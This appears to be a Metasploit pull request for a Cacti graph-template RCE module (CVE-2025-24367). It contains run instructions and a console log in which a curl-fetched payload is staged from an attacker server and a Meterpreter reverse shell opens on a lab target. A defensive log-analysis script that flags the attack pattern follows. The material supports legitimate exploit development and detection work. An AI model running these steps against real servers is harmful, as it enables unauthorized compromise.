@jheysel-r7 jheysel-r7 commented Dec 22, 2025

This module exploits an authenticated remote code execution vulnerability in Cacti versions prior to 1.2.29. Authenticated users can upload a graph template through the `/graph_templates.php` endpoint. The `right_axis_label` parameter is vulnerable to code injection, allowing attackers to execute arbitrary commands on the server. The payload is length-limited; due to this constraint, the module starts an HTTP server and hosts the payload. The initial payload downloads the full payload using curl from the attacker's server and saves it to the web root of the Cacti server before executing.

Verification

  1. Install the application
  2. Start `msfconsole`
  3. Do: `use linux/http/cacti_graph_template_rce`
  4. Do: `set target <target>`
  5. Do: `run rhost=<target address> rport=<target port> lhost=<local address> username=<username> password=<password>`
  6. You should get a shell.

Testing

Linux target Cacti 1.2.28

```
msf exploit(linux/http/cacti_graph_template_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/http/cacti_graph_template_rce) > run rhost=172.16.199.136 rport=8080 lhost=172.16.199.1 srvhost=172.16.199.1 srvport=9090 username=admin password=admin
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4444
msf exploit(linux/http/cacti_graph_template_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.28
[*] Attempting login with user `admin` and password `admin`
[+] Logged in
[+] The target is vulnerable.
[*] Using URL: http://172.16.199.1:9090/y
[*] Template update response: HTTP 200
[*] Trigger template update response: HTTP 200
[*] 172.16.199.136   cacti_graph_template_rce - Request 'GET /y'
[*] 172.16.199.136   cacti_graph_template_rce - Sending payload ...
[+] PHP payload uploaded successfully to /cacti/X.php
[*] Template update response: HTTP 200
[*] Trigger template update response: HTTP 200
[*] Sending stage (3090404 bytes) to 172.16.199.136
[+] Deleted X.php
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.136:44642) at 2025-12-21 23:27:10 -0800
msf exploit(linux/http/cacti_graph_template_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.18.0.3
OS           : Debian 11.5 (Linux 6.8.0-90-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
```

@jheysel-r7 jheysel-r7 changed the title from "Cacti Graph Template Authenticated RCE" to "Cacti Graph Template Authenticated RCE [CVE-2025-24367]" Dec 23, 2025
@jheysel-r7 jheysel-r7 added module rn-modules release notes for new or majorly enhanced modules docs labels Dec 23, 2025
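
A defender-side check for the sequence the description lays out (a write to `graph_templates.php`, then a request for a PHP file dropped into the web root), as an added example that is not part of the pull request or the module. It assumes Apache combined-format access logs and that the template write arrives as a POST; the sample log lines, addresses and the five-minute window are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample (Apache combined format); addresses and timings are illustrative.
SAMPLE_LOG = """\
192.0.2.10 - - [21/Dec/2025:23:20:01 -0800] "GET /cacti/index.php HTTP/1.1" 200 5120 "-" "ua"
198.51.100.7 - - [21/Dec/2025:23:25:40 -0800] "GET /cacti/graph_view.php HTTP/1.1" 200 7300 "-" "ua"
192.0.2.10 - - [21/Dec/2025:23:27:05 -0800] "POST /cacti/graph_templates.php HTTP/1.1" 200 9200 "-" "ua"
192.0.2.10 - - [21/Dec/2025:23:27:09 -0800] "GET /cacti/X.php HTTP/1.1" 200 0 "-" "ua"
198.51.100.7 - - [21/Dec/2025:23:27:30 -0800] "GET /cacti/graph_view.php HTTP/1.1" 200 7300 "-" "ua"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def parse(log):
    """Yield (client, time, method, path, status) for each well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the scan
        ip, ts, method, uri, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        yield ip, when, method, uri.split("?", 1)[0], int(status)

def find_suspects(log, window=timedelta(minutes=5)):
    """Flag PHP paths first served to a client shortly after it wrote a graph template."""
    seen = set()     # PHP paths already served earlier in the log (the baseline)
    last_write = {}  # client -> time of its latest POST to graph_templates.php
    hits = []
    for ip, when, method, path, status in parse(log):
        served_php = path.endswith(".php") and status == 200
        if method == "POST" and path.endswith("/graph_templates.php"):
            last_write[ip] = when
        elif served_php and path not in seen and ip in last_write:
            if when - last_write[ip] <= window:
                hits.append((ip, path, when.isoformat()))
        if served_php:
            seen.add(path)
    return hits

if __name__ == "__main__":
    for hit in find_suspects(SAMPLE_LOG):
        print("review:", hit)
```

The log has to reach back far enough for `seen` to act as a baseline; with a short log, ordinary pages an administrator opens after saving a template are flagged as well.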